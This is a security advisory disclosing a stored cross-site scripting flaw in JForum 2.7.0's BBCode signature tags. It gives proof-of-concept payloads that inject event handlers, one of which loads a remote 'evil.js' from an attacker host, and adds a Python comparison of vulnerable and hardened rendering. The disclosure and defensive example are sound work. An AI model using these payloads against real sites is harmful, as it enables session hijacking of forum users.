jforum 2.7.0 Cross Site Scripting

2021.09.04
Credit: Kun Song
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

Hi, I found a vulnerability in JForum 2.7.0. It is a stored cross-site scripting vulnerability in the user's profile signature. The technique is the same as the one described in the article "STORED CROSS SITE SCRIPTING IN BBCODE" (https://mindedsecurity.com/advisories/msa130510/): the argument of a BBCode tag is copied into an HTML attribute without escaping, so a double quote in the argument closes the attribute and whatever follows is emitted as further attributes, including event handlers.

PoC:

color tag:

    [color=red" onMouseOver="alert('xss')]XSS[/color]
    [color=red" onMouseOver="$.getScript('http://192.168.45.148:8080/evil.js') ;"]XSS[/color]

Renders into HTML:

    <font onmouseover="alert('xss')" color="red">XSS</font>
    <font onmouseover="$.getScript('http://192.168.45.148:8080/evil.js');" color="red">XSS</font>

img tag:

    [img]/demo.jpg" onMouseOver="alert('xss')[/img]

Renders into HTML:

    <img src="/demo.jpg" onmouseover="alert('xss')" alt="image">

url= tag:

    [url='http://www.demo.com" onMouseOver="alert('xss')']test[/url]

Renders into HTML:

    <a class="snap_shots" href="http://www.demo.com" onmouseover="alert('xss')" target="_blank">test</a>

The forum sets its cookie to HttpOnly, so the injected handler cannot read the session cookie directly. That does not neutralise the bug: the handler runs in the forum origin with the viewing user's session, and with jQuery's $.getScript (available on the forum pages, as the second color payload shows) the attacker can load an attacker-hosted script and perform any action the victim is allowed to perform.

This vulnerability has been fixed in https://sourceforge.net/p/jforum2/code/934/ .

Timeline:
2021-04-21 Reported to the JForum developer by e-mail
2021-04-22 JForum fixed the vulnerability; the fix will be included in the next release
2021-09-02 Sent this mail to bugtraq & fulldisclosure
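The attribute-injection mechanism above, as an added example in Python; this is not JForum's own code (JForum is a Java project with its own BBCode engine). The regex renderer `render_vulnerable` is a stand-in constructed to reproduce the advisory's rendered HTML, `render_hardened` shows the shape of the fix (allow-list the tag argument, then attribute-escape it), and `event_handlers` parses the output the way a browser would and lists any on* attributes that reached the DOM. The three payloads are the PoC strings quoted in the advisory; the colour and hostname patterns are assumptions for illustration.

```python
import html
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed inputs: the three PoC payloads quoted in the advisory.
PAYLOADS = {
    "color": "[color=red\" onMouseOver=\"alert('xss')]XSS[/color]",
    "img": "[img]/demo.jpg\" onMouseOver=\"alert('xss')[/img]",
    "url": "[url='http://www.demo.com\" onMouseOver=\"alert('xss')']test[/url]",
}

COLOR_TAG = re.compile(r"\[color=(.*?)\](.*?)\[/color\]", re.S)
IMG_TAG = re.compile(r"\[img\](.*?)\[/img\]", re.S)
URL_TAG = re.compile(r"\[url='?(.*?)'?\](.*?)\[/url\]", re.S)


def render_vulnerable(text: str) -> str:
    """Regex BBCode -> HTML in the style the advisory describes: the tag
    argument is pasted into an attribute verbatim, so a double quote in it
    closes the attribute and the remainder becomes new attributes."""
    text = COLOR_TAG.sub(r'<font color="\1">\2</font>', text)
    text = IMG_TAG.sub(r'<img src="\1" alt="image">', text)
    text = URL_TAG.sub(r'<a class="snap_shots" href="\1" target="_blank">\2</a>', text)
    return text


# Assumed allow-lists (not JForum's): a named colour or #hex for [color=...],
# and a plain hostname[:port] for absolute URLs.
COLOR_VALUE = re.compile(r"#[0-9a-fA-F]{3}|#[0-9a-fA-F]{6}|[A-Za-z]{1,20}")
HOSTNAME = re.compile(r"[A-Za-z0-9.-]+(:\d{1,5})?")


def safe_url(value: str, allow_relative: bool = False):
    """Return the value ready for an href/src attribute, or None to reject it.
    Scheme and host are allow-listed first, then the value is attribute-escaped."""
    value = value.strip()
    parsed = urlparse(value)
    if parsed.scheme:
        if parsed.scheme.lower() not in ("http", "https"):
            return None                      # javascript:, data:, vbscript: ...
        if not HOSTNAME.fullmatch(parsed.netloc):
            return None                      # quote or space smuggled into the host
    elif not (allow_relative and value.startswith("/")):
        return None
    # quote=True turns " and ' into entities, so the value can never close the attribute.
    return html.escape(value, quote=True)


def render_hardened(text: str) -> str:
    """Same three tags, but every argument is validated and escaped before it is
    placed in an attribute; a rejected tag degrades to its escaped inner text."""
    def color(m):
        value, body = m.group(1), html.escape(m.group(2))
        if not COLOR_VALUE.fullmatch(value):
            return body
        return f'<font color="{value}">{body}</font>'

    def img(m):
        src = safe_url(m.group(1), allow_relative=True)
        return f'<img src="{src}" alt="image">' if src else html.escape(m.group(1))

    def url(m):
        href, body = safe_url(m.group(1)), html.escape(m.group(2))
        if href is None:
            return body
        return f'<a class="snap_shots" href="{href}" target="_blank" rel="noopener">{body}</a>'

    text = COLOR_TAG.sub(color, text)
    text = IMG_TAG.sub(img, text)
    return URL_TAG.sub(url, text)


class _HandlerFinder(HTMLParser):
    """Collects (tag, attribute) pairs for every on* attribute a parser sees."""
    def __init__(self):
        super().__init__()
        self.handlers = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases attribute names, so onMouseOver arrives as onmouseover.
        self.handlers += [(tag, name) for name, _ in attrs if name.startswith("on")]


def event_handlers(markup: str):
    """Parse rendered HTML the way a browser would and list event-handler attributes.
    An escaped &quot; inside a value stays inside that value, so it is not reported."""
    finder = _HandlerFinder()
    finder.feed(markup)
    return finder.handlers


if __name__ == "__main__":
    for name, payload in PAYLOADS.items():
        bad, good = render_vulnerable(payload), render_hardened(payload)
        print(f"[{name}] vulnerable: {bad}\n        handlers: {event_handlers(bad)}")
        print(f"[{name}] hardened:   {good}\n        handlers: {event_handlers(good)}\n")
```

Run it and the vulnerable output for each payload carries an onmouseover handler, matching the advisory's rendered HTML up to the attribute order a browser serialises. The hardened renderer rejects the color and url payloads outright (the argument fails the allow-list) and, for the img payload, escapes the quote so the whole string stays inside src and no handler attribute exists. Checking the result with a real HTML parser rather than a substring search matters: the escaped img output still contains the text `onMouseOver=`, but inside an attribute value it is inert.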


Copyright 2021, cxsecurity.com
